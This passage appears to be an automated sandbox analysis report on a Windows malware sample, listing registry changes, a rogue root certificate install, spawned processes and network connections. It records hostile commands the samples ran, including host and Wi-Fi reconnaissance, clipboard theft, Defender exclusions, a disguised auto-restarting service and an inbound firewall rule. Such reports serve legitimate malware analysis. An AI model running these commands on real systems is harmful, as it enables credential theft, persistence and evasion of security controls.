| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3169499791-3545231813-3156325206-1000\{D851ACE9-42E4-46EC-9EB0-B15D6F4D181C} | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 | C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000016001\b22e0b08f0.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\d6105747d3d97f0202125567f82b2e04ae696dd101582fc288d69800abdf32eb.exe
"C:\Users\Admin\AppData\Local\Temp\d6105747d3d97f0202125567f82b2e04ae696dd101582fc288d69800abdf32eb.exe"
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
"C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
"C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"
C:\Users\Admin\1000015002\5abc5821d6.exe
"C:\Users\Admin\1000015002\5abc5821d6.exe"
C:\Users\Admin\AppData\Local\Temp\1000016001\b22e0b08f0.exe
"C:\Users\Admin\AppData\Local\Temp\1000016001\b22e0b08f0.exe"
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
"C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
C:\Users\Admin\AppData\Local\Temp\1000017001\f2e8263483.exe
"C:\Users\Admin\AppData\Local\Temp\1000017001\f2e8263483.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa0254ab58,0x7ffa0254ab68,0x7ffa0254ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1644 --field-trial-handle=1884,i,5821116115084751294,7424518065302705047,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1884,i,5821116115084751294,7424518065302705047,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2244 --field-trial-handle=1884,i,5821116115084751294,7424518065302705047,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3060 --field-trial-handle=1884,i,5821116115084751294,7424518065302705047,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3068 --field-trial-handle=1884,i,5821116115084751294,7424518065302705047,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3580 --field-trial-handle=1884,i,5821116115084751294,7424518065302705047,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4456 --field-trial-handle=1884,i,5821116115084751294,7424518065302705047,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4676 --field-trial-handle=1884,i,5821116115084751294,7424518065302705047,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4688 --field-trial-handle=1884,i,5821116115084751294,7424518065302705047,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5108 --field-trial-handle=1884,i,5821116115084751294,7424518065302705047,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5196 --field-trial-handle=1884,i,5821116115084751294,7424518065302705047,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5248 --field-trial-handle=1884,i,5821116115084751294,7424518065302705047,131072 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\1000005001\judit.exe
"C:\Users\Admin\AppData\Local\Temp\1000005001\judit.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_1476_133631872887631708\stub.exe
"C:\Users\Admin\AppData\Local\Temp\1000005001\judit.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""
C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('%error_message%', 0, 'System Error', 0+16);close()""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Users\Admin\AppData\Local\Temp\1000007001\redline123123.exe
"C:\Users\Admin\AppData\Local\Temp\1000007001\redline123123.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "chcp"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "chcp"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Get-Clipboard
C:\Windows\system32\chcp.com
chcp
C:\Windows\system32\chcp.com
chcp
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
C:\Users\Admin\AppData\Local\Temp\1000008001\upd.exe
"C:\Users\Admin\AppData\Local\Temp\1000008001\upd.exe"
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"
C:\Users\Admin\AppData\Roaming\configurationValue\One.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"
C:\Users\Admin\AppData\Local\Temp\1000025001\setup222.exe
"C:\Users\Admin\AppData\Local\Temp\1000025001\setup222.exe"
C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe
"C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\system32\HOSTNAME.EXE
hostname
C:\Windows\System32\Wbem\WMIC.exe
wmic logicaldisk get caption,description,providername
C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe
"C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe"
C:\Windows\system32\net.exe
net user
C:\Users\Admin\AppData\Local\Temp\SetupWizard.exe
SetupWizard.exe
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user
C:\Users\Admin\AppData\Local\Temp\SetupWizard-2f530882fcd058c0\SetupWizard.exe
"C:\Users\Admin\AppData\Local\Temp\SetupWizard-2f530882fcd058c0\SetupWizard.exe"
C:\Windows\system32\query.exe
query user
C:\Windows\system32\quser.exe
"C:\Windows\system32\quser.exe"
C:\Windows\system32\net.exe
net localgroup
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup
C:\Windows\system32\net.exe
net localgroup administrators
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup administrators
C:\Windows\system32\net.exe
net user guest
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user guest
C:\Windows\system32\net.exe
net user administrator
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user administrator
C:\Windows\System32\Wbem\WMIC.exe
wmic startup get caption,command
C:\Windows\system32\tasklist.exe
tasklist /svc
C:\Windows\system32\ipconfig.exe
ipconfig /all
C:\Users\Admin\AppData\Local\Temp\1000063001\drivermanager.exe
"C:\Users\Admin\AppData\Local\Temp\1000063001\drivermanager.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\system32\ROUTE.EXE
route print
C:\Windows\system32\ARP.EXE
arp -a
C:\Windows\system32\NETSTAT.EXE
netstat -ano
C:\Windows\system32\sc.exe
sc query type= service state= all
C:\Windows\system32\netsh.exe
netsh firewall show state
C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe
"C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe"
C:\Windows\system32\netsh.exe
netsh firewall show config
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
"C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Users\Admin\AppData\Local\Temp\1000070001\monster.exe
"C:\Users\Admin\AppData\Local\Temp\1000070001\monster.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_2424_133631873216797754\stub.exe
"C:\Users\Admin\AppData\Local\Temp\1000070001\monster.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Users\Admin\AppData\Local\Temp\1000073001\bin.exe
"C:\Users\Admin\AppData\Local\Temp\1000073001\bin.exe"
C:\Windows\system32\winsvc.exe
"C:\Windows\system32\winsvc.exe" "C:\Users\Admin\AppData\Local\Temp\SetupWizard-2f530882fcd058c0\SetupWizard.exe"
C:\Users\Admin\AppData\Local\Temp\1000075001\legs.exe
"C:\Users\Admin\AppData\Local\Temp\1000075001\legs.exe"
C:\Users\Admin\AppData\Local\Temp\5641a448ac\Hkbsse.exe
"C:\Users\Admin\AppData\Local\Temp\5641a448ac\Hkbsse.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3900 -ip 3900
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3900 -s 240
C:\Users\Admin\AppData\Local\Temp\5641a448ac\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\5641a448ac\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "create" "winsvc" "type=own" "start=auto" "error=ignore" "binPath=\"C:\Windows\system32\winsvc.exe\"" "DisplayName=\"Windows System Service\""
C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" create winsvc type=own start=auto error=ignore binPath=C:\Windows\system32\winsvc.exe "DisplayName=Windows System Service"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "failure" "winsvc" "reset=0" "actions=restart/0/restart/0/restart/0"
C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" failure winsvc reset=0 actions=restart/0/restart/0/restart/0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "description" "winsvc" "\"Windows System Service is the main system supervision service.\""
C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" description winsvc "Windows System Service is the main system supervision service."
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "start" "winsvc"
C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" start winsvc
C:\Windows\system32\winsvc.exe
C:\Windows\system32\winsvc.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "Add-MpPreference" "-ExclusionPath" "\"C:\Windows\system32\""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "Add-MpPreference" "-ExclusionPath" "\"C:\Windows\Temp\""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-SETACTIVE" "8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c"
C:\Windows\system32\powercfg.exe
"C:\Windows\system32\powercfg.exe" -SETACTIVE 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "standby-timeout-ac" "0"
C:\Windows\system32\powercfg.exe
"C:\Windows\system32\powercfg.exe" -change standby-timeout-ac 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "standby-timeout-dc" "0"
C:\Windows\system32\powercfg.exe
"C:\Windows\system32\powercfg.exe" -change standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "hibernate-timeout-ac" "0"
C:\Windows\system32\powercfg.exe
"C:\Windows\system32\powercfg.exe" -change hibernate-timeout-ac 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "hibernate-timeout-dc" "0"
C:\Windows\system32\powercfg.exe
"C:\Windows\system32\powercfg.exe" -change hibernate-timeout-dc 0
C:\Windows\system32\taskkill.exe
"taskkill.exe" "/F" "/IM" "winnet.exe"
C:\Windows\system32\taskkill.exe
"taskkill.exe" "/F" "/IM" "winnet.exe"
C:\Windows\system32\taskkill.exe
"taskkill.exe" "/F" "/IM" "wincfg.exe"
C:\Windows\system32\taskkill.exe
"taskkill.exe" "/F" "/IM" "wincfg.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "Remove-NetFirewallRule" "-DisplayName" "\"Windows Network Manager\""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "New-NetFirewallRule" "-DisplayName" "\"Windows Network Manager\"" "-Program" "\"C:\Windows\system32\winnet.exe\"" "-Action" "Allow" "-Direction" "Inbound" "-EdgeTraversalPolicy" "Allow" "-Enabled" "True"
C:\Windows\system32\taskkill.exe
"taskkill.exe" "/F" "/IM" "WINNET.exe"
C:\Windows\system32\taskkill.exe
"taskkill.exe" "/F" "/IM" "WINNET.exe"
C:\Windows\system32\taskkill.exe
"taskkill.exe" "/F" "/IM" "WINCFG.exe"
C:\Windows\system32\taskkill.exe
"taskkill.exe" "/F" "/IM" "WINCFG.exe"
C:\Users\Admin\AppData\Local\Temp\5641a448ac\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\5641a448ac\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| NL | 23.62.61.163:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.177.190.20.in-addr.arpa | udp |
| NL | 23.62.61.163:443 | www.bing.com | tcp |
| RU | 147.45.47.155:80 | 147.45.47.155 | tcp |
| DE | 77.91.77.81:80 | 77.91.77.81 | tcp |
| US | 8.8.8.8:53 | 155.47.45.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.77.91.77.in-addr.arpa | udp |
| DE | 77.91.77.81:80 | 77.91.77.81 | tcp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 142.250.187.206:443 | www.youtube.com | tcp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| NL | 142.250.27.84:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.27.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 216.58.213.10:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | accounts.youtube.com | udp |
| GB | 142.250.187.238:443 | accounts.youtube.com | tcp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 172.217.169.46:443 | play.google.com | udp |
| GB | 172.217.169.46:443 | play.google.com | tcp |
| GB | 172.217.169.46:443 | play.google.com | udp |
| GB | 172.217.169.46:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 10.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.187.206:443 | clients2.google.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
